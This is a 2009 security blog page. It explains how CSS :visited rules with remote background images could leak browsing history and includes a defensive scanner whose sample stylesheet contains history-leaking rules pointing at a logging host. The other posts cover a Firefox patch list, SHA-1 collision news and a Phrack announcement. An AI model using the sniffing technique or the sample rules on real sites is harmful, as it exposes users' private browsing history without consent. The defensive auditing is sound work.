Sniffing Browser History with NO Javascript!

June 15, 2009 – 6:24 AM

This is a method of sniffing your browsing history without using Javascript. If you haven’t cleaned your browsing history recently, just click “Start Scan” and the system will get to work.

If this doesn’t shock you, it should: websites are not supposed to see this information. It gives anyone, advertisers in particular, a way to read your history and profile you.

Once you click start, it may take a few minutes before initial results appear. Overall, however, this method seems to be faster and smoother. IE will persistently click at you — sorry. Your back button will also break — sorry, again.

How? Without Javascript!?

It actually works pretty simply — it is simpler than the Javascript implementation. All it does is load a page (in a hidden iframe) which contains lots of links. For every link the browser has already visited, the CSS rule for visited links applies, and that rule sets a “background” image (which isn’t really a background) whose URL points at a logging script. The request for that image records which link was visited, and the result is stored (and, in this case, displayed to you).

Proof of Concept:
http://www.making-the-web.com/misc/sites-you-visit/nojs/
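The leak described above shows up in the stylesheet itself: a rule for visited links whose declarations fetch a remote resource. The following scanner is an added example (not code from the original post or its proof of concept) that flags such rules in a CSS document, so a site owner can audit third-party stylesheets for this pattern. The sample CSS and the `logger.example` URL are constructed for the demonstration; the parser only handles flat rule blocks, not nested `@media` groups.

```javascript
// Constructed sample stylesheet (not from the original post): two rules load
// a resource only when the link is in :visited state, one benign rule does not.
const SAMPLE_CSS = `
a { color: blue; }
a:visited { color: purple; }
#l1:visited { background: url("https://logger.example/hit?site=1"); }
a.l2:visited { background-image: url(/track/2.png); }
#l3:link { background: url(/benign.png); }
`;

// Split a flat CSS document into { selector, declarations } pairs.
// Comments are stripped first; nested blocks (@media etc.) are not handled.
function parseRules(css) {
  const noComments = css.replace(/\/\*[\s\S]*?\*\//g, "");
  const rules = [];
  const re = /([^{}]+)\{([^{}]*)\}/g;
  let m;
  while ((m = re.exec(noComments)) !== null) {
    rules.push({ selector: m[1].trim(), declarations: m[2].trim() });
  }
  return rules;
}

// Return every url(...) referenced inside a declaration block.
function extractUrls(declarations) {
  return [...declarations.matchAll(/url\(\s*['"]?([^'")]+)['"]?\s*\)/gi)].map(
    (x) => x[1]
  );
}

// Flag rules whose selector depends on :visited AND whose declarations fetch a
// resource. Any such rule turns the user's history into a network signal.
function findVisitedLeaks(css) {
  return parseRules(css)
    .filter((r) => /:visited/i.test(r.selector))
    .map((r) => ({ selector: r.selector, urls: extractUrls(r.declarations) }))
    .filter((r) => r.urls.length > 0);
}

// Stand-alone run: print the flagged rules.
for (const leak of findVisitedLeaks(SAMPLE_CSS)) {
  console.log(`history-leaking rule: ${leak.selector} -> ${leak.urls.join(", ")}`);
}
```

Modern browsers now restrict which properties a visited-link rule may change and do not issue fetches on its behalf, which closes this particular channel; the scan is still a cheap way to audit stylesheets served to older user agents or pulled in from third parties.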

Firefox 3.0.11 Released

June 11, 2009 – 7:49 PM

Firefox 3.0.11 fixes several security issues found in Firefox 3.0.10:

  • JavaScript chrome privilege escalation
  • XUL scripts bypass content-policy checks
  • Incorrect principal set for file: resources loaded via location bar
  • Arbitrary code execution using event listeners attached to an element whose owner document is null
  • Race condition while accessing the private data of a NPObject JS wrapper class object
  • SSL tampering via non-200 responses to proxy CONNECT requests
  • Arbitrary domain cookie access by local file: resources
  • URL spoofing with invalid unicode characters
  • Crashes with evidence of memory corruption (rv:1.9.0.11)


Run a Check for Updates off of the Help Menu, or download a fresh copy here:
http://www.mozilla.com/en-US/firefox/

The First Few Milliseconds of an HTTPS Connection

June 11, 2009 – 8:21 AM

Here is a great post from Jeff Moser over at Moserware that gives you a detailed walk-through of what exactly happens when you make an https connection to a server (in this example: amazon.com). So much more happens than just the URL changing from http to https and a padlock icon appearing on your browser. 🙂

Read and be amazed:
http://www.moserware.com/2009/06/first-few-milliseconds-of-https.html

Attacks on SHA-1 made even easier

June 11, 2009 – 6:48 AM

Australian researchers have described a new and faster way of provoking collisions of the SHA-1 hash algorithm. With their method, a collision can be found using only 2^52 attempts. This makes practical attacks feasible and could have an impact on the medium-term use of the algorithm in digital signatures.

SHA-1 is used to verify data authenticity in many applications. To reduce the complexity of the collision process, the researchers combined a boomerang attack with the search for differential paths.

Towards the end of 2008, researchers demonstrated how to use 200 PlayStation 3 game consoles to forge SSL Certificate Authority certificates through finding MD5 hash collisions. SHA-1 could soon be in a similar position. However, successful exploits still require the attacker to have control of both hash messages. Pre-image attacks, in which attackers attempt to generate a new valid message using the hash of an already existing message, remain impossible.

The first method for speeding up the collision process was developed in early 2005, when Chinese researchers only needed 2^69 instead of 2^80 attempts to find two different records with the same hash value. A few months later, the complexity was reduced to 2^63 attempts.

The search for a successor to SHA-1 began in 2005. Algorithms of the SHA-2 family (SHA-224, SHA-256, SHA-384 and SHA-512) were among the suggestions, but they are based on essentially the same construction as SHA-1, only with longer hash values. As a result, they are probably vulnerable to the same types of attack.

Source:
http://www.h-online.com/security/Attacks-on-SHA-1-made-even-easier--/news/113510

Phrack Issue #66 – What You Were Waiting For

June 11, 2009 – 4:40 AM

We have the great pleasure to release today another excellent selection of the best Hacking articles this year. An issue full of new exploitation techniques and ground work on writing attack software.

This issue has some evil number... with a lot of evil content. Phrack proves once more how we can, every year, push the state of the art further than its known limits. Some of these exploit articles are really innovative and we are proud to be able to release those contributions in our columns. Some others bring their values on different architectures. So, check out how to attack the Objective C runtime, the latest Linux heap allocator, the FreeBSD kernel heap management system. A special paper is the one by Black about explaining and giving more insights and code on the groundbreaking work previously released as the Malloc Maleficarum technique(s). Black did rework his article quite a lot since the first version he did, and we were impressed by the evolution. This will certainly help the younger audience to persevere in the realm of heap overflow exploitation in the most recent restrictive heap management implementations on Linux. We also have articles on alphanumeric ARM shellcode (long standing work) and exploiting the PowerCell architecture. That’s indeed a lot of exploitation.

Start reading:
http://www.phrack.org/